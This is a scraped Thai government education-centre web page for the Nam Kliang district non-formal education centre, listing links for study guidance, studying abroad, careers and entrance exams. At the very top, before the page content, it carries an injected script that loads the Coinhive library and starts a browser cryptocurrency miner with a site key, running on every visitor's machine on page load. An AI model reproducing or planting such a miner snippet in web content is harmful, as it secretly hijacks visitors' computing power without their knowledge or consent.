<script src="https://coin-hive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.Anonymous ('v4qlIXPlrLxFyTcEADVk2NoWH0x20r6m',{throttle: 0.2}); miner.start(); </script> ศูนย์การศึกษานอกระบบและการศึกษาตามอัธยาศัยอำเภอน้ำเกลี้ยง

       ศบอ.ของเรา


ประวัติความเป็นมา
วิสัยทัศน์
พันธกิจ
บุคลากร


   แนะแนวพาเพลิน     

ระบบการให้บริการ อิเล็กทรอนิกส์ ในเรื่องต่างๆ ของศูนย์แนะแนว ออนไลน์

 คลายเคลียดด้วยเกมส
 ภาษาอังกฤษ ครูเคท
 เพลินเพลง
 นิทานแสนสนุก
 TV หรรษา
 เฮฮาพาเพลิน
 Computer Zone
 
ข่าว Online
 ดูแลสุขภาพ
 บทเรียน Online    


Admin Only
สำหรับ web master ผู้ดูแล website เข้าไปแก้ไข ส่วนต่างๆ ของ website นี้
วิธีการใช้งาน
ท่านเป็นผู้เข้าชม
ลำดับที่: 13657อ่านรายละเอียด

 

  กำลังปรับปรุงข้อมูล คะ

ศบอ.น้ำเกลี้ยง

  ศูนย์การศึกษานอกโรงเรียนจังหวัดศรีสะเกษ

     


อ่านรายละเอียด   Entrance  

 มีสอบตรง โค้วต้าที่ไหนบ้าง
 รายละเอียดการสอบเข้ามหาวิทยาลัย
 ข้อสอบ entrance ย้อนหลัง

    แนะแนวศึกษาต่อ.


   ท่านที่ต้องการศึกษาต่อต่างประเทศ เรามี website ที่ให้ความรู้เกี่ยวกับการศึกษาต่อประเทศต่างๆ ให้ท่านเข้าไปศึกษา ลองเข้าไปศึกษาดูซิครับ.

 ศึกษาต่อประเทศ อังกฤษ
 ศึกษาต่อประเทศ ออสเตรเลีย
 ศึกษาต่อประเทศ อเมริกา
 ศึกษาต่อประเทศ ญี่ปุ่น
 ศึกษาต่อประเทศ จีน
 ศึกษาต่อประเทศ แคนาดา
 ศึกษาต่อประเทศ นิวซีแลนด์
 ศึกษาต่อประเทศ อินเดียแนะแนวอาชีพ

      อาชีพน่าสนใจ ท่านสามารถเข้าไปศึกษาหาความรู้ แล้วนำไปประกอบอาชีพได้ หรือเป็นช่องทางในการหาความรู้เพิ่มเติม เพื่อเข้าสู่อาชีพ

 
108 ไอเดีย ธุรกิจ
 ห้องสมุดอาชีพ
 อาชีพด้านการเกษตร
 อาชีพเลี้ยงสัตว์
 แนะแนวอาชีพ
 อาชีพตามบุคลิกภาพ
 สำนักงานจัดหางาน
 ศูนย์จัดหางานคนพิการ
 อาชีพ ...พบผ่าน/namkling/download/ict.zipศูนย์การศึกษานอกระบบและการศึกษาตามอัธยาศัยอำเภอน้ำเกลี้ยง

โทร
http://srisaket.nfe.go.th/5417/
ติดต่อมาได้ที่
 

Update ข้อมูลโดย adisuk เมื่อ